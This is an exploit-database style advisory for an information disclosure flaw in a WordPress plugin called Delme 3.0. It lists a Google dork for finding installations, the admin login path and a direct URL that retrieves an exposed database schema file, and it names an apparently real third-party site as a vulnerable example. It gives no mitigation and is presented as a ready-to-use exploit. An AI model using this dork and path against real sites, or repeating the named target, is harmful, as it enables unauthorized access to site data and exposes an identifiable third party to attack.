WordPress Delme Plugins 3.0 Database Backup Vuln

1. #################################################################################################
2.  
3. # Exploit Title : WordPress Delme Plugins 3.0 Database Backup Information Disclosure Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 28/11/2018
6. # Vendor Homepage : wordpress.org
7. # Tested On : Windows and Linux
8. # Category : WebApps
9. # Version Information : 3.0
10. # Google Dorks : inurl:''/wp-content/plugins/delme/admin/''
11. # Exploit Risk : Medium
12. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
13. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
14. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
15.  
16. #################################################################################################
17.  
18. # Admin Panel Login Path :
19.  
20. /wp-login.php
21.  
22. # Exploit :
23.  
24. /wp-content/plugins/delme/admin/help/documentation/database%20schema.sql
25.  
26. #################################################################################################
27.  
28. # Example Vulnerable Site =>
29.  
30. [+] river-guesthouse.com/wp-content/plugins/delme/admin/help/documentation/database%20schema.sql
31.  
32. #################################################################################################
33.  
34. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
35.  
36. #################################################################################################